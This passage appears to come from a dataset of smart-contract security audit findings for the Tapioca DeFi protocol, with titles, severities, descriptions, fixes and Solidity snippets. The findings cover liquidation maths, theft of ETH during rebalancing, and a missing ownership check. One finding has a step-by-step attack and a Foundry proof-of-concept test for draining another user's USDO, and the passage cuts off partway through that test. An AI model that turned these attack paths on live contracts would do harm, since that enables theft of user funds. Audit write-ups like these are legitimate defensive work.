values, lower than needed, because it uses `collateralizationRate` to calculate the denominator",high,"`_computeClosingFactor` is used to calculate the required borrow amount that should be liquidated to make the user's position solvent. However, this function uses `collateralizationRate` (defaulting to 75%) to calculate the liquidated amount, while the threshold to be liquidatable is `liquidationCollateralizationRate` (defaulting to 80%). Therefore, it will return incorrect liquidated amount.\\nIn `_computeClosingFactor` of Market contract:\\n```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n\\nA user will be able to be liquidated if their ratio between borrow and collateral value exceeds `liquidationCollateralizationRate` (see `_isSolvent()` function). However, `_computeClosingFactor` uses `collateralizationRate` (defaulting to 75%) to calculate the denominator for the needed liquidate amount, while the numerator is calculated by using `liquidationCollateralizationRate` (80% in default). 
These variables were initialized in `_initCoreStorage()`.\\nIn the above calculation of `_computeClosingFactor` function, in default: `_liquidationMultiplier` = 12%, `numerator` = `borrowPart` - `liquidationStartsAt` = borrowAmount - 80% * collateralToAssetAmount => x will be: `numerator` / (1 - 75% * 112%) = `numerator` / 16%\\nHowever, during a partial liquidation of BigBang or Singularity, the actual collateral bonus is `liquidationBonusAmount`, defaulting to 10%. (code snippet). Therefore, the minimum liquidated amount required to make user solvent (unable to be liquidated again) is: numerator / (1 - 80% * 110%) = numerator / 12%.\\nAs result, `computeClosingFactor()` function will return a lower liquidated amount than needed to make user solvent, even when that function attempts to over-liquidate with `_liquidationMultiplier` > `liquidationBonusAmount`.",Use `liquidationCollateralizationRate` instead of `collateralizationRate` to calculate the denominator in `_computeClosingFactor`,"This issue will result in the user still being liquidatable after a partial liquidation because it liquidates a lower amount than needed. Therefore, the user will never be solvent again after they are undercollateralized until their position is fully liquidated. 
This may lead to the user being liquidated more than expected, or experiencing a loss of funds in attempting to recover their position.",```\\n//borrowPart and collateralPartInAsset should already be scaled due to the exchange rate computation\\nuint256 liquidationStartsAt =\\n (collateralPartInAsset * _liquidationCollateralizationRate) / (10 ** ratesPrecision);///80% collateral value in asset in default\\n\\nif (borrowPart < liquidationStartsAt) return 0;\\n\\n//compute numerator\\nuint256 numerator = borrowPart - liquidationStartsAt;\\n//compute denominator\\nuint256 diff =\\n (collateralizationRate * ((10 ** ratesPrecision) + _liquidationMultiplier)) / (10 ** ratesPrecision);\\nint256 denominator = (int256(10 ** ratesPrecision) - int256(diff)) * int256(1e13);\\n\\n//compute closing factor\\nint256 x = (int256(numerator) * int256(1e18)) / denominator;\\n```\\n +All ETH can be stolen during rebalancing for `mTOFTs` that hold native,high,"Rebalancing of ETH transfers the ETH to the destination `mTOFT` without calling `sgRecieve` which leaves the ETH hanging inside the `mTOFT` contract. This can be exploited to steal all the ETH.\\nRebalancing of `mTOFTs` that hold native tokens is done through the `routerETH` contract inside the `Balancer.sol` contract. 
Here is the code snippet for the `routerETH` contract:\\n```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n\\nThe expected behaviour is ETH being received on the destination chain whereby `sgReceive` is called and ETH is deposited inside the `TOFTVault`.\\n```\\n## mTOFT.sol\\n\\n function sgReceive(uint16, bytes memory, uint256, address, uint256 amountLD, bytes memory) external payable {\\n if (msg.sender != _stargateRouter) revert mTOFT_NotAuthorized();\\n\\n if (erc20 == address(0)) {\\n vault.depositNative{value: amountLD}();\\n } else {\\n IERC20(erc20).safeTransfer(address(vault), amountLD);\\n }\\n }\\n```\\n\\nBy taking a closer look at the logic inside the `routerETH` contract we can see that the transfer is called with an empty payload:\\n```\\n // compose stargate to swap ETH on the source to ETH on the destination\\n function swapETH(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n uint256 _amountLD, // the amount, in Local Decimals, to be swapped\\n uint256 _minAmountLD // the minimum amount accepted out on destination\\n ) external payable {\\n require(msg.value > _amountLD, ""Stargate: msg.value must be > _amountLD"");\\n\\n // wrap the ETH into WETH\\n IStargateEthVault(stargateEthVault).deposit{value: _amountLD}();\\n IStargateEthVault(stargateEthVault).approve(address(stargateRouter), _amountLD);\\n\\n // messageFee is the remainder of the msg.value after wrap\\n uint256 messageFee = msg.value - _amountLD;\\n\\n // compose a stargate swap() using the WETH that was just wrapped\\n 
stargateRouter.swap{value: messageFee}(\\n _dstChainId, // destination Stargate chainId\\n poolId, // WETH Stargate poolId on source\\n poolId, // WETH Stargate poolId on destination\\n _refundAddress, // message refund address if overpaid\\n _amountLD, // the amount in Local Decimals to swap()\\n _minAmountLD, // the minimum amount swap()er would allow to get out (ie: slippage)\\n IStargateRouter.lzTxObj(0, 0, ""0x""),\\n _toAddress, // address on destination to send to\\n bytes("""") // empty payload, since sending to EOA\\n );\\n }\\n```\\n\\nNotice the comment:\\nempty payload, since sending to EOA\\nSo `routerETH` after depositing ETH in `StargateEthVault` calls the regular `StargateRouter` but with an empty payload.\\nNext, let's see how the receiving logic works.\\nAs Stargate is just another application built on top of LayerZero the receiving starts inside the `Bridge::lzReceive` function. As the type of transfer is `TYPE_SWAP_REMOTE` the `router::swapRemote` is called:\\n```\\nfunction lzReceive(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint64 _nonce,\\n bytes memory _payload\\n) external override {\\n\\n\\n if (functionType == TYPE_SWAP_REMOTE) {\\n (\\n ,\\n uint256 srcPoolId,\\n uint256 dstPoolId,\\n uint256 dstGasForCall,\\n Pool.CreditObj memory c,\\n Pool.SwapObj memory s,\\n bytes memory to,\\n bytes memory payload\\n ) = abi.decode(_payload, (uint8, uint256, uint256, uint256, Pool.CreditObj, Pool.SwapObj, bytes, bytes));\\n address toAddress;\\n assembly {\\n toAddress := mload(add(to, 20))\\n }\\n router.creditChainPath(_srcChainId, srcPoolId, dstPoolId, c);\\n router.swapRemote(_srcChainId, _srcAddress, _nonce, srcPoolId, dstPoolId, dstGasForCall, toAddress, s, payload);\\n```\\n\\n`Router:swapRemote` has two responsibilities:\\nFirst it calls `pool::swapRemote` that transfers the actual tokens to the destination address. 
In this case this is the `mTOFT` contract.\\nSecond it will call `IStargateReceiver(mTOFTAddress)::sgReceive` but only if the payload is not empty.\\n```\\n function _swapRemote(\\n uint16 _srcChainId,\\n bytes memory _srcAddress,\\n uint256 _nonce,\\n uint256 _srcPoolId,\\n uint256 _dstPoolId,\\n uint256 _dstGasForCall,\\n address _to,\\n Pool.SwapObj memory _s,\\n bytes memory _payload\\n) internal {\\n Pool pool = _getPool(_dstPoolId);\\n // first try catch the swap remote\\n try pool.swapRemote(_srcChainId, _srcPoolId, _to, _s) returns (uint256 amountLD) {\\n if (_payload.length > 0) {\\n // then try catch the external contract call\\n try IStargateReceiver(_to).sgReceive{gas: _dstGasForCall}(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _payload) {\\n // do nothing\\n } catch (bytes memory reason) {\\n cachedSwapLookup[_srcChainId][_srcAddress][_nonce] = CachedSwap(pool.token(), amountLD, _to, _payload);\\n emit CachedSwapSaved(_srcChainId, _srcAddress, _nonce, pool.token(), amountLD, _to, _payload, reason);\\n }\\n }\\n } catch {\\n revertLookup[_srcChainId][_srcAddress][_nonce] = abi.encode(\\n TYPE_SWAP_REMOTE_RETRY,\\n _srcPoolId,\\n _dstPoolId,\\n _dstGasForCall,\\n _to,\\n _s,\\n _payload\\n );\\n emit Revert(TYPE_SWAP_REMOTE_RETRY, _srcChainId, _srcAddress, _nonce);\\n }\\n}\\n```\\n\\nAs payload is empty in case of using the `routerETH` contract the `sgReceive` function is never called. 
This means that the ETH is left sitting inside the `mTOFT` contract.\\n```\\n## TapiocaOmnichainSender.sol\\n\\n function sendPacket(LZSendParam calldata _lzSendParam, bytes calldata _composeMsg)\\n external\\n payable\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n // @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n\\n // @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) =\\n _buildOFTMsgAndOptions(_lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD);\\n\\n // @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }\\n```\\n\\nAll he has to do is specify the option type `lzNativeDrop` inside the `_lsSendParams.extraOptions` and the cost of calling `_lzSend` plus the airdrop amount will be paid out from the balance of `mTOFT`.\\nAs this is a complete theft of the rebalanced amount I'm rating this as a critical vulnerability.","```\\nfunction swapETHAndCall(\\n uint16 _dstChainId, // destination Stargate chainId\\n address payable _refundAddress, // refund additional messageFee to this address\\n bytes calldata _toAddress, // the receiver of the destination ETH\\n SwapAmount memory 
_swapAmount, // the amount and the minimum swap amount\\n IStargateRouter.lzTxObj memory _lzTxParams, // the LZ tx params\\n bytes calldata _payload // the payload to send to the destination\\n ) external payable {\\n```\\n",All ETH can be stolen during rebalancing for mTOFTs that hold native tokens.,"```\\n## Balancer.sol\\n\\nif (address(this).balance < _amount) revert ExceedsBalance();\\n uint256 valueAmount = msg.value + _amount;\\n routerETH.swapETH{value: valueAmount}(\\n _dstChainId,\\n payable(this),\\n abi.encodePacked(connectedOFTs[_oft][_dstChainId].dstOft),\\n _amount,\\n _computeMinAmount(_amount, _slippage)\\n );\\n```\\n" +"exerciseOptionsReceiver() Lack of Ownership Check for oTAP, Allowing Anyone to Use oTAPTokenID",high,"In UsdoOptionReceiverModule.exerciseOptionsReceiver(): For this method to execute successfully, the `owner` of the `oTAPTokenID` needs to approve it to `address(usdo)`. Once approved, anyone can front-run execute `exerciseOptionsReceiver()` and utilize this authorization.\\nIn `USDO.lzCompose()`, it is possible to specify `_msgType == MSG_TAP_EXERCISE` to execute `USDO.exerciseOptionsReceiver()` across chains.\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n\\nFor this method to succeed, USDO must first obtain approve for the `oTAPTokenID`.\\nExample: The owner of `oTAPTokenID` is Alice.\\nalice in A chain execute lzSend(dstEid = B) with\\ncomposeMsg = 
[oTAP.permit(usdo,oTAPTokenID,v,r,s) 2.exerciseOptionsReceiver(oTAPTokenID,_options.from=alice) 3. oTAP.revokePermit(oTAPTokenID)]\\nin chain B USDO.lzCompose() will\\nexecute oTAP.permit(usdo,oTAPTokenID)\\nexerciseOptionsReceiver(srcChainSender=alice,_options.from=alice,oTAPTokenID )\\noTAP.revokePermit(oTAPTokenID)\\nThe signature of `oTAP.permit` is public, allowing anyone to use it.\\nNote: if alice call approve(oTAPTokenID,usdo) in chain B without signature, but The same result\\nThis opens up the possibility for malicious users to front-run use this signature. Let's consider an example with Bob:\\nBob in Chain A uses Alice's signature (v, r, s):\\ncomposeMsg = [oTAP.permit(usdo, oTAPTokenID, v, r, s), exerciseOptionsReceiver(oTAPTokenID, _options.from=bob)]-----> (Note: `_options.from` should be set to Bob.)\\nIn Chain B, when executing `USDO.lzCompose(dstEid = B)`, the following actions occur:\\nExecute `oTAP.permit(usdo, oTAPTokenID)`\\nExecute `exerciseOptionsReceiver(srcChainSender=bob, _options.from=bob, oTAPTokenID)`\\nAs a result, Bob gains unconditional access to this `oTAPTokenID`.\\nIt is advisable to check the ownership of `oTAPTokenID` is `_options.from` before executing `ITapiocaOptionBroker(_options.target).exerciseOption()`.","add check `_options.from` is owner or be approved\\n```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n\\n// rest of code\\n uint256 bBefore = balanceOf(address(this));\\n// Add the line below\\n address oTap = ITapiocaOptionBroker(_options.target).oTAP();\\n// Add the line below\\n address oTapOwner = IERC721(oTap).ownerOf(_options.oTAPTokenID);\\n// Add the line below\\n require(oTapOwner == _options.from\\n// Add the line below\\n || IERC721(oTap).isApprovedForAll(oTapOwner,_options.from)\\n// Add the line below\\n || IERC721(oTap).getApproved(_options.oTAPTokenID) == _options.from\\n// Add the line below\\n ,""invalid"");\\n 
ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n }\\n```\\n","The `exerciseOptionsReceiver()` function lacks ownership checks for `oTAP`, allowing anyone to use `oTAPTokenID`.","```\\n function exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n// rest of code\\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token\\n _options.tapAmount\\n );\\n _approve(address(this), address(pearlmit), 0);\\n uint256 bAfter = balanceOf(address(this));\\n\\n // Refund if less was used.\\n if (bBefore > bAfter) {\\n uint256 diff = bBefore - bAfter;\\n if (diff < _options.paymentTokenAmount) {\\n IERC20(address(this)).safeTransfer(_options.from, _options.paymentTokenAmount - diff);\\n }\\n }\\n// rest of code\\n```\\n" +Wrong parameter in remote transfer makes it possible to steal all USDO balance from users,high,"Setting a wrong parameter when performing remote transfers enables an attack flow where USDO can be stolen from users.\\nThe following bug describes a way to leverage Tapioca's remote transfers in order to drain any user's USDO balance. Before diving into the issue, a bit of background regarding compose calls is required in order to properly understand the attack.\\nTapioca allows users to leverage LayerZero's compose calls, which enable complex interactions between messages sent across chains. Compose messages are always preceded by a sender address in order for the destination chain to understand who the sender of the compose message is. 
When the compose message is received, `TapiocaOmnichainReceiver.lzCompose()` will decode the compose message, extract the `srcChainSender_` and trigger the internal `_lzCompose()` call with the decoded `srcChainSender_` as the sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. \\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n\\nOne of the type of compose calls supported in tapioca are remote transfers. When the internal `_lzCompose()` is triggered, users who specify a msgType equal to `MSG_REMOTE_TRANSFER` will make the `_remoteTransferReceiver()` internal call be executed:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n\\n // rest of code\\n\\n}\\n```\\n\\nRemote transfers allow users to burn tokens in one chain and mint them in another chain by executing a recursive `_lzSend()` call. 
In order to burn the tokens, they will first be transferred from an arbitrary owner set by the function caller via the `_internalTransferWithAllowance()` function.\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, \\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nAfter transferring the tokens via `_internalTransferWithAllowance()`, `_internalRemoteTransferSendPacket()` will be triggered, which is the function that will actually burn the tokens and execute the recursive `_lzSend()` call:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _internalRemoteTransferSendPacket( \\n address _srcChainSender,\\n LZSendParam memory _lzSendParam, \\n bytes memory _composeMsg\\n ) internal returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt) {\\n // Burn tokens from this contract\\n (uint256 amountDebitedLD_, uint256 amountToCreditLD_) = _debitView(\\n _lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid \\n ); \\n _burn(address(this), amountToCreditLD_); \\n \\n // rest of code\\n \\n // Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, 
_composeMsg, amountToCreditLD_, _srcChainSender \\n ); // msgSender is the sender of the composed message. We keep context by passing `_srcChainSender`.\\n \\n // Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // rest of code\\n }\\n```\\n\\nAs we can see, the `_lzSend()` call performed inside `_internalRemoteTransferSendPacket()` allows to trigger the remote call with another compose message (built using the `_buildOFTMsgAndOptionsMemory()` function). If there is an actual `_composeMsg` to be appended, the sender of such message will be set to the `_internalRemoteTransferSendPacket()` function's `_srcChainSender` parameter.\\nThe problem is that when `_internalRemoteTransferSendPacket()` is called, the parameter passed as the source chain sender is set to the arbitrary owner address supplied by the caller in the initial compose call, instead of the actual source chain sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n // rest of code\\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, // <------ This parameter will become the _srcChainSender in the recursive compose message call\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nThis makes it possible for an attacker to create an attack vector that allows to drain any user's USDO balance. The attack path is as follows:\\nExecute a remote call from chain A to chain B. This call has a compose message that will be triggered in chain B.\\nThe remote transfer message will set the arbitrary `owner` to any victim's address. 
It is important to also set the amount to be transferred in this first compose call to 0 so that the `attacker` can bypass the allowance check performed inside the `_remoteTransferReceiver()` call.\\nWhen the compose call gets executed, a second packed compose message will be built and triggered inside `_internalRemoteTransferSendPacket()`. This second compose message will be sent from chain B to chain A, and the source chain sender will be set to the arbitrary `owner` address that the `attacker` wants to drain due to the incorrect parameter being passed. It will also be a remote transfer action.\\nWhen chain A receives the compose message, a third compose will be triggered. This third compose is where the token transfers will take place. Inside the `_lzReceive()` triggered in chain A, the composed message will instruct to transfer and burn a certain amount of tokens (selected by the `attacker` when crafting the attack). Because the source chain sender is the victim address and the `owner` specified is also the victim, the `_internalTransferWithAllowance()` executed in chain A will not check for allowances because the `owner` and the spender are the same address (the victim's address). This will burn the attacker's desired amount from the victim's wallet.\\nFinally, a last `_lzSend()` will be triggered to chain B, where the burnt tokens in chain A will be minted. Because the compose calls allow to set a specific recipient address, the receiver of the minted tokens will be the `attacker`.\\nAs a summary: the attack allows to combine several compose calls recursively so that an attacker can burn victim's tokens in Chain A, and mint them in chain B to a desired address. The following diagram summarizes the attack for clarity:\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. 
In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_stealUSDOFromATargetUserDueToWrongParameter() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = 
address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n \\n deal(address(aUsdo), makeAddr(""victim""), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // FINAL MESSAGE A ---> B \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: makeAddr(""victim""), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: bytes(""""),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes("""") // next message\\n );\\n\\n // SECOND MESSAGE B ---> A \\n\\n SendParam memory sendParamBToA = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 0, // IMPORTANT: This must be set to 0 to bypass the allowance check performed inside 
`_remoteTransferReceiver()`\\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(""victim""), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: toeComposeMsgVictim,\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n bytes("""") // next message\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n vm.startPrank(makeAddr(""attacker""));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), 
\\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // This triggers a message back to chain A, in which the srcChainSender will be set as the victim inside the\\n // composed message due to the wrong parameter passed\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Chain A: message is received, internally a compose flow is retriggered.\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n toeComposeMsgVictim\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // At this point, the srcChainSender is the victim (as set in the previous lzCompose) because of the wrong parameter (the `expectEmit` verifies it).\\n // The `owner` specified for the remote transfer is also the victim, so the allowance check is bypassed because `owner` == `srcChainSender`.\\n // This allows the 
